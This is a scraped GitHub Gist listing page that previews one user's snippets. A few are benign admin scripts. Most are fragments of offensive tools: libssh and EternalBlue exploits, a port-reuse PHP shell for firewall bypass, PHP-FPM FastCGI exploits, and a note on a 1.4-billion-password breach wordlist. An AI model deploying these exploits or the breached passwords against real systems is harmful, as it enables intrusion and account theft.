Skip to content

Instantly share code, notes, and snippets.

@Arryboom
Arryboom / reporter.sh
Created October 27, 2020 09:11 — forked from archichen/reporter.sh
一行命令生成所有占用端口及其进程报告|Generate a report for all occupied port and their program with a line command
# Choose one command, Copy it and execute, no need for execute reporter.sh file.
# Report file was place at /tmp/reporter.csv|md
# CSV version
# Preview: https://imgur.com/c5E0T1v
netstat -ntlp | awk 'BEGIN{ system("echo IP, Port, PID, Parameter > /tmp/reporter.csv") } NR>2 {if($4 !~ "::" && $7 != "-"){split($4,ipAndPort,":"); split($7,pidAndProgress,"/"); system("echo "ipAndPort[1]","ipAndPort[2]","pidAndProgress[1]", `cat /proc/"pidAndProgress[1]"/cmdline` >> /tmp/reporter.csv")}}'
# Markdown version
# Preview: https://imgur.com/ivmUhgu
netstat -ntlp | awk 'BEGIN{ system("echo \\|IP\\|Port\\|PID\\|Parameter\\| > /tmp/reporter.md; echo \\|-\\|-\\|-\\|-\\| >> /tmp/reporter.md") } NR>2 {if($4 !~ "::" && $7 != "-"){split($4,ipAndPort,":"); split($7,pidAndProgress,"/"); system("echo \\|"ipAndPort[1]"\\|"ipAndPort[2]"\\|"pidAndProgress[1]"\\|`cat /proc/"pidAndProgress[1]"/cmdline`\\| >> /tmp/reporter.md")}}'
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
@Arryboom
Arryboom / breachcompilation.txt
Created January 15, 2018 03:50
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@Arryboom
Arryboom / ruby.2.4.1-setup.sh
Created August 7, 2017 07:48 — forked from mustafaturan/ruby.2.6.3-setup.sh
ruby 2.4.1 setup for centos 6.x
#!/usr/bin/env bash
# repository
cd /tmp
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
rpm -Uvh epel-release-6-8.noarch.rpm
# system update
yum -y update
yum -y groupinstall "Development Tools"
yum -y install libxslt-devel libyaml-devel libxml2-devel gdbm-devel libffi-devel zlib-devel openssl-devel libyaml-devel readline-devel curl-devel openssl-devel pcre-devel git memcached-devel valgrind-devel mysql-devel ImageMagick-devel ImageMagick
@Arryboom
Arryboom / eternalblue8_exploit.py
Created July 12, 2017 05:19 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@Arryboom
Arryboom / port_reuse.php
Created June 3, 2017 08:44 — forked from wofeiwo/port_reuse.php
Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
<?php
//
// port_reuse.php
//
// Created by wofeiwo <[email protected]> on 2011-08-27.
// Copyright 2011 80sec. All rights reserved.
// Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
// Note: Only available on PHP >= 5.3.6 with mod_php on apache.
// Usage: 1. Put the script on htdocs.
// 2. Get interactive shell:
@Arryboom
Arryboom / fcgi_exp.go
Created June 3, 2017 08:44 — forked from wofeiwo/fcgi_exp.go
PHP-FPM Fastcgi Exploit
// PHP FactCGI remote exploit
// Date: 2012-09-15
// Author: [email protected]
// Note: Just for research purpose
package main
import (
"./fcgiclient"
"fmt"
@Arryboom
Arryboom / fcgi_jailbreak.php
Created June 3, 2017 08:43 — forked from wofeiwo/fcgi_jailbreak.php
Jail break for PHP 5.3.3+ FASTCGI
<?php
/**
* PHP 5.3.3+ FASTCGI jailbreak
*
* @author wofeiwo <wofeiwo#80sec.com>
* @date 2013-01-23
* @version 1.0
* @reference https://bugs.php.net/bug.php?id=64103
* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
* @note disable php security settings, but can't overwrite disable_function/disable_classes.
@Arryboom
Arryboom / fpm.py
Created June 3, 2017 08:36 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False